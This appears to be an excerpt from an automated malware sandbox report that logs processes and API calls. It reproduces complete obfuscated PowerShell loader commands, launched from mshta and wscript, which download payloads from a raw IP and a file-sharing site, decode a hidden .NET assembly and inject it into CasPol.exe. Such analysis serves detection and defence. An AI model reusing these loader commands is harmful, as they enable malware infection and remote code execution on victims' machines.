                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sysTEm32\WInDowSpoWeRShell\V1.0\POwersheLL.exE" "powErsHEll.eXE -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt ; IeX($(iEX('[SYsTem.tExT.EnCoDINg]'+[ChAR]0x3a+[ChaR]0x3a+'utF8.GeTSTrING([SystEM.cOnvERt]'+[CHAR]0x3a+[cHAR]58+'FrOMbASe64STrING('+[CHAr]34+'JFM1UFpiNiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZVJERUZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1PTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhwSGhsTndBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFRSdEdKUEJ0ZSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaEFVYVRQUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjTWFReEFTWWhsSyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInhaQm5VRSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NzVWlPTklmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRTNVBaYjY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDQuMTY4LjQ2LjI2LzE0MjIvYmVzdG9mdGhpbmdzd2l0aGVudGlyZXRpbWVnaXZlbmVic3R0aGlnbnN0b2Rvd2l0aGdyZWF0LnRJRiIsIiRFblY6QVBQREFUQVxiZXN0b2Z0aGluZ3N3aXRoZW50aXJldGltZWdpdmVuZWJzdHRoaWduc3RvZG93aXRoZy52QnMiLDAsMCk7U3RhclQtc2xFRVAoMyk7SWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGJlc3RvZnRoaW5nc3dpdGhlbnRpcmV0aW1lZ2l2ZW5lYnN0dGhpZ25zdG9kb3dpdGhnLnZCcyI='+[cHaR]0x22+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sysTEm32\WInDowSpoWeRShell\V1.0\POwersheLL.exE" "powErsHEll.eXE -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt ; IeX($(iEX('[SYsTem.tExT.EnCoDINg]'+[ChAR]0x3a+[ChaR]0x3a+'utF8.GeTSTrING([SystEM.cOnvERt]'+[CHAR]0x3a+[cHAR]58+'FrOMbASe64STrING('+[CHAr]34+'JFM1UFpiNiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZVJERUZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1PTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhwSGhsTndBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFRSdEdKUEJ0ZSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaEFVYVRQUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjTWFReEFTWWhsSyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInhaQm5VRSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NzVWlPTklmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRTNVBaYjY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDQuMTY4LjQ2LjI2LzE0MjIvYmVzdG9mdGhpbmdzd2l0aGVudGlyZXRpbWVnaXZlbmVic3R0aGlnbnN0b2Rvd2l0aGdyZWF0LnRJRiIsIiRFblY6QVBQREFUQVxiZXN0b2Z0aGluZ3N3aXRoZW50aXJldGltZWdpdmVuZWJzdHRoaWduc3RvZG93aXRoZy52QnMiLDAsMCk7U3RhclQtc2xFRVAoMyk7SWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGJlc3RvZnRoaW5nc3dpdGhlbnRpcmV0aW1lZ2l2ZW5lYnN0dGhpZ25zdG9kb3dpdGhnLnZCcyI='+[cHaR]0x22+'))')))"
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnMmtkaW1hZycrJ2VVcmwgPSBlQzRodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlLycrJ2dldD9maWxla2V5PXMnKydoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtJysnZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBlQzQ7Mmtkd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDsya2RpbWFnZUJ5dGVzID0gMmtkd2ViQ2xpZW50LkRvdycrJ24nKydsb2FkRGF0YSgya2RpbWFnZVVybCk7MmtkaW1hZ2VUZXh0ID0gJysnW1N5c3RlbS5UZScrJ3h0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoMmtkaW1hZ2VCeXRlcycrJyk7Mmtkc3RhcnRGbGFnID0gZUM0PDxCQVNFNjRfU1RBUlQ+PmVDJysnNDsya2RlbmRGbGFnID0gZUM0PDxCQVNFNjRfRU5EPj5lQzQ7Mmtkc3RhcnRJbmRleCA9IDJrZGltYWdlVGV4dC5JbmRleE9mKDJrZHN0YXJ0RmxhZyk7MmtkZScrJ24nKydkSW5kZXggPSAya2RpbWFnZVRleHQuSW5kZXgnKydPZigya2RlbmRGbGEnKydnKTsya2RzdGFydEluZGV4IC1nZSAwIC1hbmQgMmtkZW5kSW5kZXggLWd0IDJrZHN0YXInKyd0SW5kZXg7Mmtkc3RhcnRJbmRleCArPSAya2RzdGFydEZsYWcuTGVuZ3QnKydoOzJrZGJhc2U2NExlbmd0aCA9IDJrZGVuZEluZGV4IC0gMmtkc3RhcnRJbmRleDsya2RiYXNlNjRDb21tYW5kID0gMmsnKydkaW1hZ2VUJysnZXh0LlN1YnN0cmluZygya2RzdGFydEluZGV4LCAya2RiYXNlNjRMZW5ndGgpOzJrZGJhc2U2NFJlJysndmVyc2VkID0gLWpvaW4gKDJrZGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBzeVYgRm9yRWFjaC1PYmplY3QgeyAya2RfIH0pWy0xLi4tKDJrZGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07MmtkY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhcycrJ2U2NFN0cmluZygya2RiYXNlNjRSZXZlcnNlZCk7MmtkbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKDJrZGNvbW1hbmRCeXRlcyk7MmtkdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChlQzRWQUllQzQpOzJrZHZhaU1ldGhvZC5JbnZva2UoJysnMmtkbnVsbCwgQChlQzR0eHQuRkdWR0ZSLzIyNDEvNjIuNjQuOCcrJzYxLjQwMS8vOnB0dGhlQzQsIGVDNGRlc2F0aXZhZG9lQzQsIGVDNGRlc2F0aXZhZG9lQzQsIGVDNGRlc2F0aXZhZG9lQzQsJysnIGVDNENhc1BvbGVDNCwgZUM0ZGVzYXRpdmFkb2VDNCwgZUM0ZGVzYXRpdmFkb2VDNCxlQycrJzRkZXNhdGl2YWRvJysnZUM0LGVDNGRlc2F0aScrJ3ZhZG9lQzQsZUM0ZGVzYXRpdmFkb2VDNCxlQzRkZXNhdGl2YWRvZUM0LGVDNGRlc2F0aXZhZG9lQycrJzQsZUM0MWVDNCxlQzRkZXNhdGl2YWRvZUM0KSk7JykgIC1jcmVwbEFDZSAgKFtjaEFSXTExNStbY2hBUl0xMjErW2NoQVJdODYpLFtjaEFSXTEyNCAgLVJlUExBY2UgIChbY2hBUl01MCtbY2hBUl0xMDcrW2NoQVJdMTAwKSxbY2hBUl0zNiAtY3JlcGxBQ2UnZUM0JyxbY2hBUl0zOSl8IC4oKGd2ICcqTURyKicpLk5BTWVbMywxMSwyXS1qT2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('2kdimag'+'eUrl = eC4https://3105.filemail.com/api/file/'+'get?filekey=s'+'hTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-'+'dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c eC4;2kdwebClient = New-Object System.Net.WebClient;2kdimageBytes = 2kdwebClient.Dow'+'n'+'loadData(2kdimageUrl);2kdimageText = '+'[System.Te'+'xt.Encoding]::UTF8.GetString(2kdimageBytes'+');2kdstartFlag = eC4<<BASE64_START>>eC'+'4;2kdendFlag = eC4<<BASE64_END>>eC4;2kdstartIndex = 2kdimageText.IndexOf(2kdstartFlag);2kde'+'n'+'dIndex = 2kdimageText.Index'+'Of(2kdendFla'+'g);2kdstartIndex -ge 0 -and 2kdendIndex -gt 2kdstar'+'tIndex;2kdstartIndex += 2kdstartFlag.Lengt'+'h;2kdbase64Length = 2kdendIndex - 2kdstartIndex;2kdbase64Command = 2k'+'dimageT'+'ext.Substring(2kdstartIndex, 2kdbase64Length);2kdbase64Re'+'versed = -join (2kdbase64Command.ToCharArray() syV ForEach-Object { 2kd_ })[-1..-(2kdbase64Command.Length)];2kdcommandBytes = [System.Convert]::FromBas'+'e64String(2kdbase64Reversed);2kdloadedAssembly = [System.Reflection.Assembly]::Load(2kdcommandBytes);2kdvaiMethod = [dnlib.IO.Home].GetMethod(eC4VAIeC4);2kdvaiMethod.Invoke('+'2kdnull, @(eC4txt.FGVGFR/2241/62.64.8'+'61.401//:pttheC4, eC4desativadoeC4, eC4desativadoeC4, eC4desativadoeC4,'+' eC4CasPoleC4, eC4desativadoeC4, eC4desativadoeC4,eC'+'4desativado'+'eC4,eC4desati'+'vadoeC4,eC4desativadoeC4,eC4desativadoeC4,eC4desativadoeC'+'4,eC41eC4,eC4desativadoeC4));') -creplACe ([chAR]115+[chAR]121+[chAR]86),[chAR]124 -RePLAce ([chAR]50+[chAR]107+[chAR]100),[chAR]36 -creplACe'eC4',[chAR]39)| .((gv '*MDr*').NAMe[3,11,2]-jOiN'')"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sysTEm32\WInDowSpoWeRShell\V1.0\POwersheLL.exE" "powErsHEll.eXE -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt ; IeX($(iEX('[SYsTem.tExT.EnCoDINg]'+[ChAR]0x3a+[ChaR]0x3a+'utF8.GeTSTrING([SystEM.cOnvERt]'+[CHAR]0x3a+[cHAR]58+'FrOMbASe64STrING('+[CHAr]34+'JFM1UFpiNiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZVJERUZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1PTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhwSGhsTndBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFRSdEdKUEJ0ZSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaEFVYVRQUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjTWFReEFTWWhsSyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInhaQm5VRSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NzVWlPTklmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRTNVBaYjY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDQuMTY4LjQ2LjI2LzE0MjIvYmVzdG9mdGhpbmdzd2l0aGVudGlyZXRpbWVnaXZlbmVic3R0aGlnbnN0b2Rvd2l0aGdyZWF0LnRJRiIsIiRFblY6QVBQREFUQVxiZXN0b2Z0aGluZ3N3aXRoZW50aXJldGltZWdpdmVuZWJzdHRoaWduc3RvZG93aXRoZy52QnMiLDAsMCk7U3RhclQtc2xFRVAoMyk7SWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGJlc3RvZnRoaW5nc3dpdGhlbnRpcmV0aW1lZ2l2ZW5lYnN0dGhpZ25zdG9kb3dpdGhnLnZCcyI='+[cHaR]0x22+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnMmtkaW1hZycrJ2VVcmwgPSBlQzRodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlLycrJ2dldD9maWxla2V5PXMnKydoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtJysnZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBlQzQ7Mmtkd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDsya2RpbWFnZUJ5dGVzID0gMmtkd2ViQ2xpZW50LkRvdycrJ24nKydsb2FkRGF0YSgya2RpbWFnZVVybCk7MmtkaW1hZ2VUZXh0ID0gJysnW1N5c3RlbS5UZScrJ3h0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoMmtkaW1hZ2VCeXRlcycrJyk7Mmtkc3RhcnRGbGFnID0gZUM0PDxCQVNFNjRfU1RBUlQ+PmVDJysnNDsya2RlbmRGbGFnID0gZUM0PDxCQVNFNjRfRU5EPj5lQzQ7Mmtkc3RhcnRJbmRleCA9IDJrZGltYWdlVGV4dC5JbmRleE9mKDJrZHN0YXJ0RmxhZyk7MmtkZScrJ24nKydkSW5kZXggPSAya2RpbWFnZVRleHQuSW5kZXgnKydPZigya2RlbmRGbGEnKydnKTsya2RzdGFydEluZGV4IC1nZSAwIC1hbmQgMmtkZW5kSW5kZXggLWd0IDJrZHN0YXInKyd0SW5kZXg7Mmtkc3RhcnRJbmRleCArPSAya2RzdGFydEZsYWcuTGVuZ3QnKydoOzJrZGJhc2U2NExlbmd0aCA9IDJrZGVuZEluZGV4IC0gMmtkc3RhcnRJbmRleDsya2RiYXNlNjRDb21tYW5kID0gMmsnKydkaW1hZ2VUJysnZXh0LlN1YnN0cmluZygya2RzdGFydEluZGV4LCAya2RiYXNlNjRMZW5ndGgpOzJrZGJhc2U2NFJlJysndmVyc2VkID0gLWpvaW4gKDJrZGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBzeVYgRm9yRWFjaC1PYmplY3QgeyAya2RfIH0pWy0xLi4tKDJrZGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07MmtkY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhcycrJ2U2NFN0cmluZygya2RiYXNlNjRSZXZlcnNlZCk7MmtkbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKDJrZGNvbW1hbmRCeXRlcyk7MmtkdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChlQzRWQUllQzQpOzJrZHZhaU1ldGhvZC5JbnZva2UoJysnMmtkbnVsbCwgQChlQzR0eHQuRkdWR0ZSLzIyNDEvNjIuNjQuOCcrJzYxLjQwMS8vOnB0dGhlQzQsIGVDNGRlc2F0aXZhZG9lQzQsIGVDNGRlc2F0aXZhZG9lQzQsIGVDNGRlc2F0aXZhZG9lQzQsJysnIGVDNENhc1BvbGVDNCwgZUM0ZGVzYXRpdmFkb2VDNCwgZUM0ZGVzYXRpdmFkb2VDNCxlQycrJzRkZXNhdGl2YWRvJysnZUM0LGVDNGRlc2F0aScrJ3ZhZG9lQzQsZUM0ZGVzYXRpdmFkb2VDNCxlQzRkZXNhdGl2YWRvZUM0LGVDNGRlc2F0aXZhZG9lQycrJzQsZUM0MWVDNCxlQzRkZXNhdGl2YWRvZUM0KSk7JykgIC1jcmVwbEFDZSAgKFtjaEFSXTExNStbY2hBUl0xMjErW2NoQVJdODYpLFtjaEFSXTEyNCAgLVJlUExBY2UgIChbY2hBUl01MCtbY2hBUl0xMDcrW2NoQVJdMTAwKSxbY2hBUl0zNiAtY3JlcGxBQ2UnZUM0JyxbY2hBUl0zOSl8IC4oKGd2ICcqTURyKicpLk5BTWVbMywxMSwyXS1qT2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('2kdimag'+'eUrl = eC4https://3105.filemail.com/api/file/'+'get?filekey=s'+'hTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-'+'dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c eC4;2kdwebClient = New-Object System.Net.WebClient;2kdimageBytes = 2kdwebClient.Dow'+'n'+'loadData(2kdimageUrl);2kdimageText = '+'[System.Te'+'xt.Encoding]::UTF8.GetString(2kdimageBytes'+');2kdstartFlag = eC4<<BASE64_START>>eC'+'4;2kdendFlag = eC4<<BASE64_END>>eC4;2kdstartIndex = 2kdimageText.IndexOf(2kdstartFlag);2kde'+'n'+'dIndex = 2kdimageText.Index'+'Of(2kdendFla'+'g);2kdstartIndex -ge 0 -and 2kdendIndex -gt 2kdstar'+'tIndex;2kdstartIndex += 2kdstartFlag.Lengt'+'h;2kdbase64Length = 2kdendIndex - 2kdstartIndex;2kdbase64Command = 2k'+'dimageT'+'ext.Substring(2kdstartIndex, 2kdbase64Length);2kdbase64Re'+'versed = -join (2kdbase64Command.ToCharArray() syV ForEach-Object { 2kd_ })[-1..-(2kdbase64Command.Length)];2kdcommandBytes = [System.Convert]::FromBas'+'e64String(2kdbase64Reversed);2kdloadedAssembly = [System.Reflection.Assembly]::Load(2kdcommandBytes);2kdvaiMethod = [dnlib.IO.Home].GetMethod(eC4VAIeC4);2kdvaiMethod.Invoke('+'2kdnull, @(eC4txt.FGVGFR/2241/62.64.8'+'61.401//:pttheC4, eC4desativadoeC4, eC4desativadoeC4, eC4desativadoeC4,'+' eC4CasPoleC4, eC4desativadoeC4, eC4desativadoeC4,eC'+'4desativado'+'eC4,eC4desati'+'vadoeC4,eC4desativadoeC4,eC4desativadoeC4,eC4desativadoeC'+'4,eC41eC4,eC4desativadoeC4));') -creplACe ([chAR]115+[chAR]121+[chAR]86),[chAR]124 -RePLAce ([chAR]50+[chAR]107+[chAR]100),[chAR]36 -creplACe'eC4',[chAR]39)| .((gv '*MDr*').NAMe[3,11,2]-jOiN'')"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\blaytqul\blaytqul.cmdline"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\blaytqul\blaytqul.cmdline"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,13_2_0041BCE3
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_048D5662 push eax; iretd 3_2_048D5699
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_04BA6D00 pushfd ; retf 081Bh9_2_04BA7179
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_004567E0 push eax; ret 13_2_004567FE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0045B9DD push esi; ret 13_2_0045B9E6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00455EAF push ecx; ret 13_2_00455EC2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00433FF6 push ecx; ret 13_2_00434009
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00406128 ShellExecuteW,URLDownloadToFileW,13_2_00406128
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\blaytqul\blaytqul.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,13_2_00419BC4

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,13_2_0041BCE3
                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
